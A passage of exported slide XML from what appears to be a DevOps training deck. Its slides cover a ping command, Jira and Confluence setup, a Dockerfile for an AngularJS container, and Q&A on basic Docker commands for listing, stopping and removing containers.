            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ping command</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ping </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>frontend.dollorinfotech.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -t</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1880" name="Google Shape;1880;p305"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="695750" y="121650"/>
            <a:ext cx="7790100" cy="7044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400"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2600">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Install Jira with SMTP and SSL</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="4050">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>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306"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="583750" y="890075"/>
            <a:ext cx="7603200" cy="41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700">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Atlassian Jira is a project/team tracking tool.</a:t>
            </a:r>
            <a:endParaRPr sz="17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700">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Atlassian </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Confluence</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t> is a project/product </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>documentation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t> tool.</a:t>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The default connector port for Confluence is 8090</a:t>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-336550" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="38761D"/>
              </a:buClr>
              <a:buSzPts val="1700"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sudo apt update</a:t>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1886" name="Google Shape;1886;p306"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="695750" y="121650"/>
            <a:ext cx="7790100" cy="7044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400"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2600">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Install Confluence with docker</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="4050">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>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307"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="583750" y="890075"/>
            <a:ext cx="4205700" cy="41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2000">
                <a:solidFill>
                  <a:srgbClr val="D63200"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>FROM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="525252"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F8F8F8"/>
                </a:highlight>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> node:lts-alpine  </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SzPts val="1100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="D63200"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>RUN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="525252"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> npm install -g http-server</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SzPts val="1100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="D63200"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>WORKDIR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="525252"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> /app</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SzPts val="1100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="D63200"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>COPY</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="525252"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> package*.json ./</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SzPts val="1100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="D63200"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>RUN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="525252"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> npm install</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SzPts val="1100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="D63200"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>COPY</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="525252"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> . .</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:solidFill>
                <a:srgbClr val="707070"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="D63200"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>RUN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="525252"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> npm run build</a:t>
            </a:r>
            <a:endParaRPr sz="2100">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="D63200"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>EXPOSE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="525252"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F8F8F8"/>
                </a:highlight>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="A32EFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>8080</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:solidFill>
                <a:srgbClr val="A32EFF"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buSzPts val="275"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="D63200"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>CMD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="525252"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> [ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="42B983"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>"http-server"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="525252"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="42B983"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>"dist"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="525252"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> ]</a:t>
            </a:r>
            <a:endParaRPr sz="2350">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1892" name="Google Shape;1892;p307"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="162200" y="121650"/>
            <a:ext cx="8793300" cy="704400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="275"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2950">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Create a AngularJs Container using Dockerfile</a:t>
            </a:r>
            <a:endParaRPr sz="2100">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>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3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3420">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Q &amp; A</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3420">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1898" name="Google Shape;1898;p3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AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How to check which containers are running ? </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>docker ps</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Write down any 5 Dockerfile commands? </a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Which is the first Dockerfile command ? </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>FROM</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>What is the command to stop all running container ? </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>docker stop $(docker ps -q)</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>What is the command to stop all container ? </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>docker stop $(docker ps -a -q)</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>What is the command to remove all containers ? </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>docker rm $(docker ps -a -q)</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>What is the command to remove the image? </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>docker rmi imagename/imageId</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>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3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990"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3720">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Q &amp; A</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3720">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1904" name="Google Shape;1904;p3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6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How to start all stopped containers in single command ?</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How to remove all stopped container in a single command? </a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2000">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>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3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820">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Useful</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2820">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> docker commands</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2820">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1910" name="Google Shape;1910;p310"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="105700" y="1187875"/>
            <a:ext cx="9038400" cy="3672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853">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>docker stop $(docker ps -a -q) -t 0</a:t>
            </a:r>
            <a:endParaRPr sz="1853">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="105000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="852"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1853">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>docker rm $(docker ps -a -q)</a:t>
            </a:r>
            <a:endParaRPr sz="1853">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="105000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="852"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1853">
